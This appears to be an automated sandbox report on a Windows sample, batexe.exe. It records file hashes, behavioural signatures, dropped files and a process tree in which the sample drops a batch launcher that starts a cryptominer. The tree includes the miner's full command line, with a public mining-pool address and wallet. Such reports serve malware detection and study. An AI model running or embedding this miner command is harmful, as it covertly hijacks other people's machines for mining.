Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
293s -
max time network
298s -
platform
windows10-1703_x64 -
resource
win10-20240214-ja -
resource tags
arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows -
submitted
19/02/2024, 16:06
Behavioral task
behavioral1
Sample
batexe.exe
Resource
win10-20240214-ja
Behavioral task
behavioral2
Sample
batexe.exe
Resource
win10v2004-20231215-ja
General
-
Target
batexe.exe
-
Size
9.4MB
-
MD5
cdc9eacffc6d2bf43153815043064427
-
SHA1
d05101f265f6ea87e18793ab0071f5c99edf363f
-
SHA256
73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
-
SHA512
fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
-
SSDEEP
196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv
Malware Config
Signatures
-
Executes dropped EXE 2 IoCs
pid Process 4548 b2e.exe 1968 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 1968 cpuminer-sse2.exe 1968 cpuminer-sse2.exe 1968 cpuminer-sse2.exe 1968 cpuminer-sse2.exe 1968 cpuminer-sse2.exe -
resource yara_rule behavioral1/memory/2628-4-0x0000000000400000-0x000000000393A000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2628 wrote to memory of 4548 2628 batexe.exe 74 PID 2628 wrote to memory of 4548 2628 batexe.exe 74 PID 2628 wrote to memory of 4548 2628 batexe.exe 74 PID 4548 wrote to memory of 3464 4548 b2e.exe 75 PID 4548 wrote to memory of 3464 4548 b2e.exe 75 PID 4548 wrote to memory of 3464 4548 b2e.exe 75 PID 3464 wrote to memory of 1968 3464 cmd.exe 78 PID 3464 wrote to memory of 1968 3464 cmd.exe 78
Processes
-
C:\Users\Admin\AppData\Local\Temp\batexe.exe"C:\Users\Admin\AppData\Local\Temp\batexe.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2628 -
C:\Users\Admin\AppData\Local\Temp\8FAD.tmp\b2e.exe"C:\Users\Admin\AppData\Local\Temp\8FAD.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\8FAD.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\91A1.tmp\batchfile.bat" "3⤵
- Suspicious use of WriteProcessMemory
PID:3464 -
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 34⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1968
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.8MB
MD5fd6b6fec31b8af2014531ec3919d28df
SHA1d4eca90aba1e61340815c0da20a25ffc538470e5
SHA256ed34a679b11b2a308f2200a1608be42633c49ea507311d29d196f34c5e516553
SHA512e76d09d488585dc90e1b2b1b1b24402a9cadb578ecaba57fc1a917e3c4c23c2ce127eae1f4a5cb27bc79b29331b0592fa39fbbc0f271344640531a42e2b05345
-
Filesize
2.8MB
MD52740cb40f3bb942bacad943e76dfc78b
SHA1fde11bb3935bb4b9a3b6fb116c2ab41115df46f4
SHA256bdd722aeae58ed53a890f323f98b6d6fdc19b09ca2c806897938fa99370f58ab
SHA5122262bc0eccba4e0d6d77bb6644db0a8fea37d1e5db4c981aa838fa2899815aeb22833c6061bf1711505643e0bea655f6cdd0a9f18730c6d154713492a57e9875
-
Filesize
136B
MD58ea7ac72a10251ecfb42ef4a88bd330a
SHA1c30f6af73a42c0cc89bd20fe95f9159d6f0756c5
SHA25665e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9
SHA512a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0
-
Filesize
605KB
MD587d616fb414ead497fa7ddeede50f0dd
SHA15214cba53f47663464ba1bfea9929e13c64f20de
SHA256560c76748b9d8f27aa23a68c91df0fa35a826b8eda92b5d64b1532bc6668ad60
SHA5126bcbf9c641320c115a1896d9e981057fca969bb8ee281ada0fd4cf7d08c849fb621e13a503d11fe8fec7f36c39ca010e42ae116a70f7bc3a675c358f9442ae2f
-
Filesize
1.1MB
MD5a567802cc4612e9d9dc79172bdc1c556
SHA11d5387fa3fab3ae4ec763158a5fcae85a0904a33
SHA25698833dacaf3b32d18c5d3664a6af6d3428af927f794a4724d909284eb4b1f39b
SHA5128fdfd9b52da65f4974e5e1e3459e4ed6d98f751b83658a854b6a830cdeaa215bdba2675548f83e45716eab9895506a99296d7efafe46b542001bf6af095187ac
-
Filesize
836KB
MD5aeab40ed9a8e627ea7cefc1f5cf9bf7a
SHA15e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8
SHA256218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9
SHA512c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8
-
Filesize
680KB
MD591dcf4e4e0601dcf9884a8493b31f3f0
SHA1a935d13dec12b875d9801ab64b643c9bbc22a9cf
SHA256073495861267c4518fe7b33e28d8e820d5e22979f672198768625e1d48c9daf4
SHA5124e981ba72fb6c08b24714eeac28dab9ded6edc47b1bd24d0140211480af890692aad6f49da47372d95eba9ee8b9806608d9d4f88f93119fd0c174b5861363ef2
-
Filesize
988KB
MD5707dfff4fbc68b026b761c44544444ba
SHA1f734a26e6c3c8c7a89df9b0e0755d963976aecf3
SHA2562caae95a7e024ca3e4947bed79edd1390312ee5dc1fdb527705e1b3bc8d08411
SHA512413786c24a45fb216b1327df65db76222218f74be93eefdb4a6e576490417078d86009c1702522afbe41ffbe49cb0e792c502d25555b99f6fc06d0e72648dcf0
-
Filesize
372KB
MD5705ed533e1e01ab35abccc20e734d3ba
SHA184ee778c348dd2ffcc37509a484a0a9a13afd293
SHA2565330a12f54bc71bda98f45b8b96b7511fea54fb06bd386dc6624b16d2b4bf30e
SHA512b72ecdd9c56035ff3126f6b46323aa07c894c2b1ab79e3c6782194e8b2750886aecb5e9a6d93bdbc724ced71d00a4f64a933a678c630c2f9a9df42d3102b14b9
-
Filesize
657KB
MD5e35956de023d4ffe18a28cbea4dda264
SHA191231a1678d50e173c4b8a7e5b94e785a6f1d8d3
SHA256e1b9dab3eac13dc3ce383ad0ba5facb3cf05e2ca47dc00cfb25b4eb43ceef509
SHA5121cdfba630c0547ba81d8eaf283735a2d3ea3644311b9074e6b30e1e83e8044c3d0bc6a793cba87e2b0113d682429bc2c8f4a187669664eb898022d590fa47adb
-
Filesize
606KB
MD5be4b3bf90d18d55b619e38c9634ed844
SHA13f9e71179a31765d30e5c56783ce928474e2e57f
SHA2569c3c3997b6cdce49b3638b32499c238a3517be0cf1667c65b5a942cd94a3a531
SHA512ae7f734f5ebdd53e42409f22b26b42f35a28c972edf5fec9293515712d6794d584f6968336dac2b389c0a1d9186b7a4b5ea92ec28ef82ac2cbb60bf6295f0ede
-
Filesize
791KB
MD511d6343d4761ccae10626996ca8daa86
SHA1599a5e4ec46e42c422641067cd198ef91d9d1abe
SHA25621ff431fef0216505a3a57760b432aac81159dd0539a0c45b559c971a0353d27
SHA51273f64d678a82e49948b252ebfd68a1d73c6b8acc2d18af00fadd5b3780a8b83cc3ffbae198860caee588f398f4afb6a65ddb2821eb42e7a9d3cbd9d6b86f6f60
-
Filesize
240KB
MD55907c423db736020f455acd05acc3cbc
SHA1e090aaae8e9c8afcaa0ad122aa50597db14aad18
SHA2561485a1f4e2c660ef3c0c7928ca1e434a3f91a7e4d46a2743734ecaa1d8a47840
SHA512d97a05421fa0f7d4be8cc33d9954df63ac04891fa21e77b564d22a2e766f1065194585e89ab10dd41ef7bf7b555e0d82ed3b64c7df4016f0b72e625187c1cf05
-
Filesize
606KB
MD5585efec1bc1d4d916a4402c9875dff75
SHA1d209613666ccac9d0ddab29a3bc59aa00a0968fa
SHA2562f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232
SHA512b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770